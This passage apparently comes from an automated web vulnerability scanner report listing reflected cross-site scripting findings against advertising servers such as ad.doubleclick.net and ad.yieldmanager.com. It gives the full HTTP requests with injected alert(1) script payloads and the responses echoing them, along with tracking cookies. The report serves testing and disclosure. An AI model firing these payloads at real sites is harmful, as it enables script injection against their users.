Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:30:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=220cf0"-alert(1)-"da21d5ca8f4&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27
...[SNIP]...
2.34. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5db2"-alert(1)-"f4687176ca0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041b5db2"-alert(1)-"f4687176ca0&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:29:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
bleclick.net/click%3Bh%3Dv8/3b05/17/14b/%2a/q%3B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041b5db2"-alert(1)-"f4687176ca0&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.
...[SNIP]...
2.35. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d73dc"-alert(1)-"0d4d57175ea was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52d73dc"-alert(1)-"0d4d57175ea&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52d73dc"-alert(1)-"0d4d57175ea&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-96463%7CHardware%7C300x250-_-BRAND_MEDLAR_NETWORKING_NA_300X250_A");
var fsc
...[SNIP]...
2.36. http://ad.doubleclick.net/adj/pcw.main.blogs/bizfeed/index [blg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/pcw.main.blogs/bizfeed/index

Issue detail

The value of the blg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 523bc'%3balert(1)//b3b035e5bf1 was submitted in the blg parameter. This input was echoed as 523bc';alert(1)//b3b035e5bf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/pcw.main.blogs/bizfeed/index;blg=523bc'%3balert(1)//b3b035e5bf1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/blogs/id,61/bizfeed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6190
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 13:32:05 GMT
Expires: Thu, 12 May 2011 13:32:05 GMT

document.write('<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\r\n<VAST version=\"2.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceSchemaLocation=\"vast.xsd\"
...[SNIP]...
<![CDATA[http://ad.doubleclick.net/imp;v7;j;239708791;0-0;0;31663029;426/240;41597265/41615052/1;;~aopt=2/1/64/0;~okv=;blg=523bc';alert(1)//b3b035e5bf1;bsg=102491;bsg=104070;bsg=106172;bsg=102971;bsg=103565;bsg=103910;bsg=104468;bsg=104635;bsg=110475;bsg=110477;bsg=110478;bsg=110799;bsg=110802;bsg=110821;bsg=110021;;~cs=c%3fhttp://s0.2mdn.net/dot.gif
...[SNIP]...
2.37. http://ad.doubleclick.net/adj/pcw.main.news/products/computers/laptops/article [blg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/pcw.main.news/products/computers/laptops/article

Issue detail

The value of the blg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b38c'%3balert(1)//7e42ef4a333 was submitted in the blg parameter. This input was echoed as 1b38c';alert(1)//7e42ef4a333 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/pcw.main.news/products/computers/laptops/article;blg=1b38c'%3balert(1)//7e42ef4a333 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6190
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 13:28:56 GMT
Expires: Thu, 12 May 2011 13:28:56 GMT

document.write('<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\r\n<VAST version=\"2.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceSchemaLocation=\"vast.xsd\"
...[SNIP]...
<![CDATA[http://ad.doubleclick.net/imp;v7;j;239708791;0-0;0;28183100;426/240;41597265/41615052/1;;~aopt=2/1/64/0;~okv=;blg=1b38c';alert(1)//7e42ef4a333;bsg=102491;bsg=104070;bsg=106172;bsg=102971;bsg=103565;bsg=103910;bsg=104468;bsg=104635;bsg=110475;bsg=110477;bsg=110478;bsg=110799;bsg=110802;bsg=110821;bsg=110021;;~cs=y%3fhttp://s0.2mdn.net/dot.gif
...[SNIP]...
2.38. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65d2b"><script>alert(1)</script>8aa7f7337f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=621649&65d2b"><script>alert(1)</script>8aa7f7337f5=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!<!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~!#vtn~!$m%+!1CPe!%]D<!!!!$!?5%!$U*40!ZZ<)!!jYm!'iBj~~~~~~=!=eG~M.jTN"; bh="b!!!%,!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!-=!=eG!!0O<!!!!7=!=eG!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!3=!=eG!!J<E!!!!3=!=eG!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!4=!=eG!!q:E!!!!1=!=eG!!q<+!!!!2=!=eG!!q</!!!!2=!=eG!!q<3!!!!2=!=eG!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#=!=eG!!tjQ!!!!,<yq][!!ucq!!!!7=!=eG!!vRm!!!!-=!=eG!!vRq!!!!-=!=eG!!vRr!!!!-=!=eG!!vRw!!!!7=!=eG!!vRx!!!!-=!=eG!!vRy!!!!-=!=eG!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!-=!=eG!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!-=!=eH!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!-=!=eG!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!-=!=eG!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!-=!=eG!#MTF!!!!-=!=eG!#MTH!!!!-=!=eG!#MTI!!!!-=!=eG!#MTJ!!!!-=!=eG!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!3=!=eG!#SF3!!!!3=!=eG!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!-=!=eG!#UDP!!!!3=!=eG!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!-=!=eG!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!-=!=eG!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!-=!=eG!#tM)!!!!-=!=eG!#tn2!!!!-=!=eG!#uE=!!!!#<x9#K!#uJY!!!!3=!=eG!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!-=!=eG!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!0=!=eG!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!-=!=eG!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!-=!=eG!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!0=!=eG!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; ih="b!!!!R!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!'=!>N?!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1CPe!!!!#=!=eG!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; vuday1=!!!!#NpqDMN==#3uKEgS; BX=8khj7j56qmjsh&b=4&s=dk&t=106; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp1v4-_5>3Qm_Z5lxm/ZqKA/a92

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:32 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 13:33:32 GMT
Pragma: no-cache
Content-Length: 4687
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?65d2b"><script>alert(1)</script>8aa7f7337f5=1&Z=728x90&s=621649&t=2" target="_parent">
...[SNIP]...
2.39. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33898"-alert(1)-"7c7717e2c00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?anmember=541&anprice=300&ad_type=ad&ad_size=300x250&section=1588565&33898"-alert(1)-"7c7717e2c00=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://adserving2.cpxinteractive.com/st?ad_type=iframe&ad_size=300x250&section=1588565
